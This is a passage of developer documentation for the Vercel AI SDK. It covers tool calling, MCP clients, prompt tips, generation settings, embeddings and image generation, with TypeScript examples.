To access intermediate tool calls and results, you can use the steps property in the result object
or the streamText onFinish callback.
It contains all the text, tool calls, tool results, and more from each step.
Example: Extract tool results from all steps
import { generateText } from 'ai';
const { steps } = await generateText({
model: openai('gpt-4-turbo'),
maxSteps: 10,
// ...
});
// extract all tool calls from the steps:
const allToolCalls = steps.flatMap(step => step.toolCalls);
onStepFinish callback
When using generateText or streamText, you can provide an onStepFinish callback that
is triggered when a step is finished,
i.e. all text deltas, tool calls, and tool results for the step are available.
When you have multiple steps, the callback is triggered for each step.
import { generateText } from 'ai';
const result = await generateText({
// ...
onStepFinish({ text, toolCalls, toolResults, finishReason, usage }) {
// your own logic, e.g. for saving the chat history or recording usage
},
});
experimental_prepareStep callback
The experimental_prepareStep callback is called before a step is started.
It is called with the following parameters:
- model: The model that was passed into generateText.
- maxSteps: The maximum number of steps that was passed into generateText.
- stepNumber: The number of the step that is being executed.
- steps: The steps that have been executed so far.
You can use it to provide different settings for a step.
import { generateText } from 'ai';
const result = await generateText({
// ...
experimental_prepareStep: async ({ model, stepNumber, maxSteps, steps }) => {
if (stepNumber === 0) {
return {
// use a different model for this step:
model: modelForThisParticularStep,
// force a tool choice for this step:
toolChoice: { type: 'tool', toolName: 'tool1' },
// limit the tools that are available for this step:
experimental_activeTools: ['tool1'],
};
}
// when nothing is returned, the default settings are used
},
});
Response Messages
Adding the generated assistant and tool messages to your conversation history is a common task, especially if you are using multi-step tool calls.
Both generateText and streamText have a response.messages property that you can use to
add the assistant and tool messages to your conversation history.
It is also available in the onFinish callback of streamText.
The response.messages property contains an array of CoreMessage objects that you can add to your conversation history:
import { generateText } from 'ai';
const messages: CoreMessage[] = [
// ...
];
const { response } = await generateText({
// ...
messages,
});
// add the response messages to your conversation history:
messages.push(...response.messages); // streamText: ...((await response).messages)
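With streamText, a minimal sketch using the onFinish callback instead (assuming the same messages array as above):
import { streamText } from 'ai';

const result = streamText({
  // ...
  messages,
  onFinish({ response }) {
    // add the assistant and tool messages to your conversation history:
    messages.push(...response.messages);
  },
});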
Tool Choice
You can use the toolChoice setting to influence when a tool is selected.
It supports the following settings:
- auto (default): the model can choose whether and which tools to call.
- required: the model must call a tool. It can choose which tool to call.
- none: the model must not call tools.
- { type: 'tool', toolName: string (typed) }: the model must call the specified tool.
import { z } from 'zod';
import { generateText, tool } from 'ai';
const result = await generateText({
model: yourModel,
tools: {
weather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
toolChoice: 'required', // force the model to call a tool
prompt: 'What is the weather in San Francisco?',
});
Tool Execution Options
When tools are called, they receive additional options as a second parameter.
Tool Call ID
The ID of the tool call is forwarded to the tool execution. You can use it e.g. when sending tool-call related information with stream data.
import { StreamData, streamText, tool } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const data = new StreamData();
const result = streamText({
// ...
messages,
tools: {
myTool: tool({
// ...
execute: async (args, { toolCallId }) => {
// return e.g. custom status for tool call
data.appendMessageAnnotation({
type: 'tool-status',
toolCallId,
status: 'in-progress',
});
// ...
},
}),
},
onFinish() {
data.close();
},
});
return result.toDataStreamResponse({ data });
}
Messages
The messages that were sent to the language model to initiate the response that contained the tool call are forwarded to the tool execution.
You can access them in the second parameter of the execute function.
In multi-step calls, the messages contain the text, tool calls, and tool results from all previous steps.
import { generateText, tool } from 'ai';
const result = await generateText({
// ...
tools: {
myTool: tool({
// ...
execute: async (args, { messages }) => {
// use the message history in e.g. calls to other language models
return something;
},
}),
},
});
Abort Signals
The abort signals from generateText and streamText are forwarded to the tool execution.
You can access them in the second parameter of the execute function and e.g. abort long-running computations or forward them to fetch calls inside tools.
import { z } from 'zod';
import { generateText, tool } from 'ai';
const result = await generateText({
model: yourModel,
abortSignal: myAbortSignal, // signal that will be forwarded to tools
tools: {
weather: tool({
description: 'Get the weather in a location',
parameters: z.object({ location: z.string() }),
execute: async ({ location }, { abortSignal }) => {
return fetch(
`https://api.weatherapi.com/v1/current.json?q=${location}`,
{ signal: abortSignal }, // forward the abort signal to fetch
);
},
}),
},
prompt: 'What is the weather in San Francisco?',
});
Types
Modularizing your code often requires defining types to ensure type safety and reusability. To enable this, the AI SDK provides several helper types for tools, tool calls, and tool results.
You can use them to strongly type your variables, function parameters, and return types
in parts of the code that are not directly related to streamText or generateText.
Each tool call is typed with ToolCall<NAME extends string, ARGS>, depending
on the tool that has been invoked.
Similarly, the tool results are typed with ToolResult<NAME extends string, ARGS, RESULT>.
The tools in streamText and generateText are defined as a ToolSet.
The type inference helpers ToolCallUnion<TOOLS extends ToolSet>
and ToolResultUnion<TOOLS extends ToolSet> can be used to
extract the tool call and tool result types from the tools.
import { openai } from '@ai-sdk/openai';
import { ToolCallUnion, ToolResultUnion, generateText, tool } from 'ai';
import { z } from 'zod';
const myToolSet = {
firstTool: tool({
description: 'Greets the user',
parameters: z.object({ name: z.string() }),
execute: async ({ name }) => `Hello, ${name}!`,
}),
secondTool: tool({
description: 'Tells the user their age',
parameters: z.object({ age: z.number() }),
execute: async ({ age }) => `You are ${age} years old!`,
}),
};
type MyToolCall = ToolCallUnion<typeof myToolSet>;
type MyToolResult = ToolResultUnion<typeof myToolSet>;
async function generateSomething(prompt: string): Promise<{
text: string;
toolCalls: Array<MyToolCall>; // typed tool calls
toolResults: Array<MyToolResult>; // typed tool results
}> {
return generateText({
model: openai('gpt-4o'),
tools: myToolSet,
prompt,
});
}
Handling Errors
The AI SDK has the following tool-call related errors:
- NoSuchToolError: the model tries to call a tool that is not defined in the tools object
- InvalidToolArgumentsError: the model calls a tool with arguments that do not match the tool's parameters
- ToolExecutionError: an error that occurred during tool execution
- ToolCallRepairError: an error that occurred during tool call repair
generateText
generateText throws errors and can be handled using a try/catch block:
import {
  generateText,
  NoSuchToolError,
  InvalidToolArgumentsError,
  ToolExecutionError,
} from 'ai';
try {
const result = await generateText({
//...
});
} catch (error) {
if (NoSuchToolError.isInstance(error)) {
// handle the no such tool error
} else if (InvalidToolArgumentsError.isInstance(error)) {
// handle the invalid tool arguments error
} else if (ToolExecutionError.isInstance(error)) {
// handle the tool execution error
} else {
// handle other errors
}
}
streamText
streamText sends the errors as part of the full stream. The error parts contain the error object.
When using toDataStreamResponse, you can pass a getErrorMessage function to extract the error message from the error part and forward it as part of the data stream response:
const result = streamText({
// ...
});
return result.toDataStreamResponse({
getErrorMessage: error => {
if (NoSuchToolError.isInstance(error)) {
return 'The model tried to call an unknown tool.';
} else if (InvalidToolArgumentsError.isInstance(error)) {
return 'The model called a tool with invalid arguments.';
} else if (ToolExecutionError.isInstance(error)) {
return 'An error occurred during tool execution.';
} else {
return 'An unknown error occurred.';
}
},
});
Tool Call Repair
Language models sometimes fail to generate valid tool calls, especially when the parameters are complex or the model is smaller.
You can use the experimental_repairToolCall function to attempt to repair the tool call
with a custom function.
You can use different strategies to repair the tool call:
- Use a model with structured outputs to generate the arguments.
- Send the messages, system prompt, and tool schema to a stronger model to generate the arguments.
- Provide more specific repair instructions based on which tool was called.
Example: Use a model with structured outputs for repair
import { openai } from '@ai-sdk/openai';
import { generateObject, generateText, NoSuchToolError } from 'ai';
const result = await generateText({
model,
tools,
prompt,
experimental_repairToolCall: async ({
toolCall,
tools,
parameterSchema,
error,
}) => {
if (NoSuchToolError.isInstance(error)) {
return null; // do not attempt to fix invalid tool names
}
const tool = tools[toolCall.toolName as keyof typeof tools];
const { object: repairedArgs } = await generateObject({
model: openai('gpt-4o', { structuredOutputs: true }),
schema: tool.parameters,
prompt: [
`The model tried to call the tool "${toolCall.toolName}"` +
` with the following arguments:`,
JSON.stringify(toolCall.args),
`The tool accepts the following schema:`,
JSON.stringify(parameterSchema(toolCall)),
'Please fix the arguments.',
].join('\n'),
});
return { ...toolCall, args: JSON.stringify(repairedArgs) };
},
});
Example: Use the re-ask strategy for repair
import { generateText } from 'ai';
const result = await generateText({
model,
tools,
prompt,
experimental_repairToolCall: async ({
toolCall,
tools,
error,
messages,
system,
}) => {
const result = await generateText({
model,
system,
messages: [
...messages,
{
role: 'assistant',
content: [
{
type: 'tool-call',
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
args: toolCall.args,
},
],
},
{
role: 'tool' as const,
content: [
{
type: 'tool-result',
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
result: error.message,
},
],
},
],
tools,
});
const newToolCall = result.toolCalls.find(
newToolCall => newToolCall.toolName === toolCall.toolName,
);
return newToolCall != null
? {
toolCallType: 'function' as const,
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
args: JSON.stringify(newToolCall.args),
}
: null;
},
});
Active Tools
Language models can only handle a limited number of tools at a time, depending on the model.
To allow static typing over a large number of tools while at the same time limiting the tools available to the model,
the AI SDK provides the experimental_activeTools property.
It is an array of tool names that are currently active.
By default, the value is undefined and all tools are active.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text } = await generateText({
model: openai('gpt-4o'),
tools: myToolSet,
experimental_activeTools: ['firstTool'],
prompt: 'Greet the user Alice.',
});
Multi-modal Tool Results
In order to send multi-modal tool results, e.g. screenshots, back to the model, they need to be converted into a specific format.
AI SDK Core tools have an optional experimental_toToolResultContent function
that converts the tool result into a content part.
Here is an example for converting a screenshot into a content part:
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20241022'),
tools: {
computer: anthropic.tools.computer_20241022({
// ...
async execute({ action, coordinate, text }) {
switch (action) {
case 'screenshot': {
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
experimental_toToolResultContent(result) {
return typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'image', data: result.data, mimeType: 'image/png' }];
},
}),
},
// ...
});
Extracting Tools
Once you start having many tools, you might want to extract them into separate files.
The tool helper function is crucial for this, because it ensures correct type inference.
Here is an example of an extracted tool:
import { tool } from 'ai';
import { z } from 'zod';
// the `tool` helper function ensures correct type inference:
export const weatherTool = tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
});
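You can then import and use the extracted tool, e.g. as sketched below (the file path tools/weather-tool is a hypothetical choice):
import { generateText } from 'ai';
import { weatherTool } from './tools/weather-tool'; // hypothetical path

const result = await generateText({
  model: yourModel,
  tools: { weather: weatherTool },
  prompt: 'What is the weather in San Francisco?',
});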
MCP Tools
The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools. This enables your AI applications to discover and use tools across various services through a standardized interface.
Initializing an MCP Client
Create an MCP client using either:
- SSE (Server-Sent Events): uses HTTP-based real-time communication, better suited for remote servers that need to send data over the network
- stdio: uses standard input and output streams for communication, ideal for local tool servers running on the same machine (like CLI tools or local services)
- Custom transport: bring your own transport by implementing the MCPTransport interface, ideal when implementing transports from MCP's official TypeScript SDK (e.g. StreamableHTTPClientTransport)
SSE Transport
The SSE transport can be configured using a simple object with a type and url property:
import { experimental_createMCPClient as createMCPClient } from 'ai';
const mcpClient = await createMCPClient({
transport: {
type: 'sse',
url: 'https://my-server.com/sse',
// optional: configure HTTP headers, e.g. for authentication
headers: {
Authorization: 'Bearer my-api-key',
},
},
});
Stdio Transport
The Stdio transport requires importing the StdioMCPTransport class from the ai/mcp-stdio package:
import { experimental_createMCPClient as createMCPClient } from 'ai';
import { Experimental_StdioMCPTransport as StdioMCPTransport } from 'ai/mcp-stdio';
const mcpClient = await createMCPClient({
transport: new StdioMCPTransport({
command: 'node',
args: ['src/stdio/dist/server.js'],
}),
});
Custom Transport
You can also bring your own transport, as long as it implements the MCPTransport interface. Below is an example of using the new StreamableHTTPClientTransport from MCP's official Typescript SDK:
import {
MCPTransport,
experimental_createMCPClient as createMCPClient,
} from 'ai';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp';
const url = new URL('http://localhost:3000/mcp');
const mcpClient = await createMCPClient({
transport: new StreamableHTTPClientTransport(url, {
sessionId: 'session_123',
}),
});
Closing the MCP Client
After initialization, you should close the MCP client based on your usage pattern:
- For short-lived usage (e.g., single requests), close the client when the response is finished
- For long-running clients (e.g., command line apps), keep the client open but ensure it's closed when the application terminates
When streaming responses, you can close the client when the LLM response has finished. For example, when using streamText, you should use the onFinish callback:
const mcpClient = await experimental_createMCPClient({
// ...
});
const tools = await mcpClient.tools();
const result = await streamText({
model: openai('gpt-4o'),
tools,
prompt: 'What is the weather in Brooklyn, New York?',
onFinish: async () => {
await mcpClient.close();
},
});
When generating responses without streaming, you can use try/finally or cleanup functions in your framework:
let mcpClient: MCPClient | undefined;
try {
mcpClient = await experimental_createMCPClient({
// ...
});
// use the client here, e.g. pass await mcpClient.tools() to generateText
} finally {
await mcpClient?.close();
}
Using MCP Tools
The client's tools method acts as an adapter between MCP tools and AI SDK tools. It supports two approaches for working with tool schemas:
Schema Discovery
The simplest approach where all tools offered by the server are listed, and input parameter types are inferred based on the schemas provided by the server:
const tools = await mcpClient.tools();
Pros:
- Simpler to implement
- Automatically stays in sync with server changes
Cons:
- No TypeScript type safety during development
- No IDE autocompletion for tool parameters
- Errors only surface at runtime
- Loads all tools from the server
Schema Definition
You can also define the tools and their input schemas explicitly in your client code:
import { z } from 'zod';
const tools = await mcpClient.tools({
schemas: {
'get-data': {
parameters: z.object({
query: z.string().describe('The data query'),
format: z.enum(['json', 'text']).optional(),
}),
},
// For tools with zero arguments, you should use an empty object:
'tool-with-no-args': {
parameters: z.object({}),
},
},
});
Pros:
- Control over which tools are loaded
- Full TypeScript type safety
- Better IDE support with autocompletion
- Catch parameter mismatches during development
Cons:
- Need to manually keep schemas in sync with server
- More code to maintain
When you define schemas, the client will only pull the explicitly defined tools, even if the server offers additional tools. This can be beneficial for:
- Keeping your application focused on the tools it needs
- Reducing unnecessary tool loading
- Making your tool dependencies explicit
Examples
You can see tools in action using various frameworks in the following examples:
<ExampleLinks examples={[ { title: 'Learn to use tools in Node.js', link: '/cookbook/node/call-tools', }, { title: 'Learn to use tools in Next.js with Route Handlers', link: '/cookbook/next/call-tools', }, { title: 'Learn to use MCP tools in Node.js', link: '/cookbook/node/mcp-tools', }, ]} />
title: Prompt Engineering description: Learn how to develop prompts with AI SDK Core.
Prompt Engineering
Tips
Prompts for Tools
When you create prompts that include tools, getting good results can be tricky as the number and complexity of your tools increases.
Here are a few tips to help you get the best results:
- Use a model that is strong at tool calling, such as gpt-4 or gpt-4-turbo. Weaker models will often struggle to call tools effectively and flawlessly.
- Keep the number of tools low, e.g. to 5 or less.
- Keep the complexity of the tool parameters low. Complex Zod schemas with many nested and optional elements, unions, etc. can be challenging for the model to work with.
- Use semantically meaningful names for your tools, parameters, parameter properties, etc. The more information you pass to the model, the better it can understand what you want.
- Add .describe("...") to your Zod schema properties to give the model hints about what a particular property is for.
- When the output of a tool might be unclear to the model and there are dependencies between tools, use the description field of a tool to provide information about the output of the tool execution.
- You can include example input/outputs of tool calls in your prompt to help the model understand how to use the tools. Keep in mind that the tools work with JSON objects, so the examples should use JSON.
In general, the goal should be to give the model all information it needs in a clear way.
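For example, here is a sketch of a tool that applies several of these tips (semantic names, .describe() hints, a description that explains the output). The tool and its return values are hypothetical:
import { tool } from 'ai';
import { z } from 'zod';

const searchFlights = tool({
  description:
    'Search for flights between two airports. ' +
    'Returns a list of flights with airline, departure time, and price in USD.',
  parameters: z.object({
    origin: z.string().describe('IATA code of the departure airport, e.g. "SFO"'),
    destination: z.string().describe('IATA code of the arrival airport, e.g. "JFK"'),
    date: z.string().date().describe('Departure date in YYYY-MM-DD format'),
  }),
  execute: async ({ origin, destination, date }) => {
    // hypothetical flight search implementation:
    return [{ airline: 'Example Air', departure: '08:00', priceUsd: 199 }];
  },
});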
Tool & Structured Data Schemas
The mapping from Zod schemas to LLM inputs (typically JSON schema) is not always straightforward, since the mapping is not one-to-one.
Zod Dates
Zod expects JavaScript Date objects, but models return dates as strings.
You can specify and validate the date format using z.string().datetime() or z.string().date(),
and then use a Zod transformer to convert the string to a Date object.
const result = await generateObject({
model: openai('gpt-4-turbo'),
schema: z.object({
events: z.array(
z.object({
event: z.string(),
date: z
.string()
.date()
.transform(value => new Date(value)),
}),
),
}),
prompt: 'List 5 important events from the year 2000.',
});
Debugging
Inspecting Warnings
Not all providers support all AI SDK features. Providers either throw exceptions or return warnings when they do not support a feature. To check if your prompt, tools, and settings are handled correctly by the provider, you can check the call warnings:
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello, world!',
});
console.log(result.warnings);
HTTP Request Bodies
You can inspect the raw HTTP request bodies for models that expose them, e.g. OpenAI. This allows you to inspect the exact payload that is sent to the model provider in the provider-specific way.
Request bodies are available via the request.body property of the response:
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello, world!',
});
console.log(result.request.body);
title: Settings description: Learn how to configure the AI SDK.
Settings
Large language models (LLMs) typically provide settings to augment their output.
All AI SDK functions support the following common settings in addition to the model, the prompt, and additional provider-specific settings:
const result = await generateText({
model: yourModel,
maxTokens: 512,
temperature: 0.3,
maxRetries: 5,
prompt: 'Invent a new holiday and describe its traditions.',
});
maxTokens
Maximum number of tokens to generate.
temperature
Temperature setting.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means almost deterministic results, and higher values mean more randomness.
It is recommended to set either temperature or topP, but not both.
topP
Nucleus sampling.
The value is passed through to the provider. The range depends on the provider and model. For most providers, nucleus sampling is a number between 0 and 1. E.g. 0.1 would mean that only tokens with the top 10% probability mass are considered.
It is recommended to set either temperature or topP, but not both.
topK
Only sample from the top K options for each subsequent token.
Used to remove "long tail" low probability responses.
Recommended for advanced use cases only. You usually only need to use temperature.
presencePenalty
The presence penalty affects the likelihood that the model repeats information that is already in the prompt.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means no penalty.
frequencyPenalty
The frequency penalty affects the likelihood that the model repeatedly uses the same words or phrases.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means no penalty.
stopSequences
The stop sequences to use for stopping the text generation.
If set, the model will stop generating text when one of the stop sequences is generated. Providers may have limits on the number of stop sequences.
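For example, a minimal sketch that stops generation at custom markers (the sequences are arbitrary choices):
const result = await generateText({
  model: yourModel,
  stopSequences: ['\n\n', 'END'], // stop when either sequence is generated
  prompt: 'Write a one-paragraph summary of nucleus sampling.',
});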
seed
The seed (integer) to use for random sampling. If set and supported by the model, calls will generate deterministic results.
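For example (results are only deterministic if the model supports seeds):
const result = await generateText({
  model: yourModel,
  seed: 42, // same seed + same prompt => same output, if supported
  prompt: 'Invent a new holiday and describe its traditions.',
});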
maxRetries
Maximum number of retries. Set to 0 to disable retries. Default: 2.
abortSignal
An optional abort signal that can be used to cancel the call.
The abort signal can e.g. be forwarded from a user interface to cancel the call, or to define a timeout.
Example: Timeout
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
abortSignal: AbortSignal.timeout(5000), // 5 seconds
});
headers
Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.
You can use the request headers to provide additional information to the provider,
depending on what the provider supports. For example, some observability providers support
headers such as Prompt-Id.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Invent a new holiday and describe its traditions.',
headers: {
'Prompt-Id': 'my-prompt-id',
},
});
title: Embeddings description: Learn how to embed values with the AI SDK.
Embeddings
Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.
Embedding a Single Value
The AI SDK provides the embed function to embed single values, which is useful for tasks such as finding similar words
or phrases or clustering text.
You can use it with embeddings models, e.g. openai.embedding('text-embedding-3-large') or mistral.embedding('mistral-embed').
import { embed } from 'ai';
import { openai } from '@ai-sdk/openai';
// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
model: openai.embedding('text-embedding-3-small'),
value: 'sunny day at the beach',
});
Embedding Many Values
When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).
The AI SDK provides the embedMany function for this purpose.
Similar to embed, you can use it with embeddings models,
e.g. openai.embedding('text-embedding-3-large') or mistral.embedding('mistral-embed').
import { openai } from '@ai-sdk/openai';
import { embedMany } from 'ai';
// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
model: openai.embedding('text-embedding-3-small'),
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
Embedding Similarity
After embedding values, you can calculate the similarity between them using the cosineSimilarity function.
This is useful to e.g. find similar words or phrases in a dataset.
You can also rank and filter related items based on their similarity.
import { openai } from '@ai-sdk/openai';
import { cosineSimilarity, embedMany } from 'ai';
const { embeddings } = await embedMany({
model: openai.embedding('text-embedding-3-small'),
values: ['sunny day at the beach', 'rainy afternoon in the city'],
});
console.log(
`cosine similarity: ${cosineSimilarity(embeddings[0], embeddings[1])}`,
);
Token Usage
Many providers charge based on the number of tokens used to generate embeddings.
Both embed and embedMany provide token usage information in the usage property of the result object:
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding, usage } = await embed({
model: openai.embedding('text-embedding-3-small'),
value: 'sunny day at the beach',
});
console.log(usage); // { tokens: 10 }
Settings
Retries
Both embed and embedMany accept an optional maxRetries parameter of type number
that you can use to set the maximum number of retries for the embedding process.
It defaults to 2 retries (3 attempts in total). You can set it to 0 to disable retries.
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: openai.embedding('text-embedding-3-small'),
value: 'sunny day at the beach',
maxRetries: 0, // Disable retries
});
Abort Signals and Timeouts
Both embed and embedMany accept an optional abortSignal parameter of
type AbortSignal
that you can use to abort the embedding process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: openai.embedding('text-embedding-3-small'),
value: 'sunny day at the beach',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
Both embed and embedMany accept an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the embedding request.
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: openai.embedding('text-embedding-3-small'),
value: 'sunny day at the beach',
headers: { 'X-Custom-Header': 'custom-value' },
});
Embedding Providers & Models
Several providers offer embedding models:
| Provider | Model | Embedding Dimensions |
|---|---|---|
| OpenAI | text-embedding-3-large | 3072 |
| OpenAI | text-embedding-3-small | 1536 |
| OpenAI | text-embedding-ada-002 | 1536 |
| Google Generative AI | text-embedding-004 | 768 |
| Mistral | mistral-embed | 1024 |
| Cohere | embed-english-v3.0 | 1024 |
| Cohere | embed-multilingual-v3.0 | 1024 |
| Cohere | embed-english-light-v3.0 | 384 |
| Cohere | embed-multilingual-light-v3.0 | 384 |
| Cohere | embed-english-v2.0 | 4096 |
| Cohere | embed-english-light-v2.0 | 1024 |
| Cohere | embed-multilingual-v2.0 | 768 |
| Amazon Bedrock | amazon.titan-embed-text-v1 | 1024 |
| Amazon Bedrock | amazon.titan-embed-text-v2:0 | 1024 |
title: Image Generation description: Learn how to generate images with the AI SDK.
Image Generation
Image generation is an experimental feature.
The AI SDK provides the generateImage
function to generate images based on a given prompt using an image model.
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
});
You can access the image data using the base64 or uint8Array properties:
const base64 = image.base64; // base64 image data
const uint8Array = image.uint8Array; // Uint8Array image data
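For example, a minimal sketch that writes the image to disk using the Uint8Array data (the file name is an arbitrary choice):
import { writeFile } from 'fs/promises';

await writeFile('image.png', image.uint8Array); // hypothetical file name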
Settings
Size and Aspect Ratio
Depending on the model, you can either specify the size or the aspect ratio.
Size
The size is specified as a string in the format {width}x{height}.
Models only support a few sizes, and the supported sizes are different for each model and provider.
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
size: '1024x1024',
});
Aspect Ratio
The aspect ratio is specified as a string in the format {width}:{height}.
Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.
import { experimental_generateImage as generateImage } from 'ai';
import { vertex } from '@ai-sdk/google-vertex';
const { image } = await generateImage({
model: vertex.image('imagen-3.0-generate-002'),
prompt: 'Santa Claus driving a Cadillac',
aspectRatio: '16:9',
});
Generating Multiple Images
generateImage also supports generating multiple images at once:
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { images } = await generateImage({
model: openai.image('dall-e-2'),
prompt: 'Santa Claus driving a Cadillac',
n: 4, // number of images to generate
});
Each image model has an internal limit on how many images it can generate in a single API call. The AI SDK manages this automatically by batching requests appropriately when you request multiple images using the n parameter. By default, the SDK uses provider-documented limits (for example, DALL-E 3 can only generate 1 image per call, while DALL-E 2 supports up to 10).
If needed, you can override this behavior using the maxImagesPerCall setting when configuring your model. This is particularly useful when working with new or custom models where the default batch size might not be optimal:
const model = openai.image('dall-e-2', {
maxImagesPerCall: 5, // Override the default batch size
});
const { images } = await generateImage({
model,
prompt: 'Santa Claus driving a Cadillac',
n: 10, // Will make 2 calls of 5 images each
});
Providing a Seed
You can provide a seed to the generateImage function to control the output of the image generation process.
If supported by the model, the same seed will always produce the same image.
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
seed: 1234567890,
});
Provider-specific Settings
Image models often have provider- or even model-specific settings.
You can pass such settings to the generateImage function
using the providerOptions parameter. The options for the provider
(openai in the example below) become request body properties.
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
size: '1024x1024',
providerOptions: {
openai: { style: 'vivid', quality: 'hd' },
},
});
Abort Signals and Timeouts
generateImage accepts an optional abortSignal parameter of
type AbortSignal
that you can use to abort the image generation process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
generateImage accepts an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the image generation request.
import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
headers: { 'X-Custom-Header': 'custom-value' },
});
Warnings
If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.
const { image, warnings } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
});
Error Handling
When generateImage cannot generate a valid image, it throws an AI_NoImageGeneratedError.
This error occurs when the AI provider fails to generate an image. It can arise for the following reasons:
- The model failed to generate a response
- The model generated a response that could not be parsed
The error preserves the following information to help you log the issue:
- responses: Metadata about the image model responses, including timestamp, model, and headers.
- cause: The cause of the error. You can use this for more detailed error handling.
import { experimental_generateImage as generateImage, NoImageGeneratedError } from 'ai';
try {
await generateImage({ model, prompt });
} catch (error) {
if (NoImageGeneratedError.isInstance(error)) {
console.log('NoImageGeneratedError');
console.log('Cause:', error.cause);
console.log('Responses:', error.responses);
}
}
Generating Images with Language Models
Some language models such as Google gemini-2.0-flash-exp support multi-modal outputs including images.
With such models, you can access the generated images using the files property of the response.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.0-flash-exp'),
providerOptions: {
google: { responseModalities: ['TEXT', 'IMAGE'] },
},
prompt: 'Generate an image of a comic cat',
});
for (const file of result.files) {
if (file.mimeType.startsWith('image/')) {
// The file object provides multiple data formats:
// Access images as base64 string, Uint8Array binary data, or check type
// - file.base64: string (data URL format)
// - file.uint8Array: Uint8Array (binary data)
// - file.mimeType: string (e.g. "image/png")
}
}
Image Models
| Provider | Model | Supported sizes (width x height) or aspect ratios (width : height) |
|---|---|---|
| xAI Grok | grok-2-image | 1024x768 (default) |
| OpenAI | gpt-image-1 | 1024x1024, 1536x1024, 1024x1536 |
| OpenAI | dall-e-3 | 1024x1024, 1792x1024, 1024x1792 |
| OpenAI | dall-e-2 | 256x256, 512x512, 1024x1024 |
| Amazon Bedrock | amazon.nova-canvas-v1:0 | 320-4096 (multiples of 16), 1:4 to 4:1, max 4.2M pixels |
| Fal | fal-ai/flux/dev | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/flux-lora | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/fast-sdxl | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/flux-pro/v1.1-ultra | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/ideogram/v2 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/recraft-v3 | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/stable-diffusion-3.5-large | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
| Fal | fal-ai/hyper-sdxl | 1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9 |
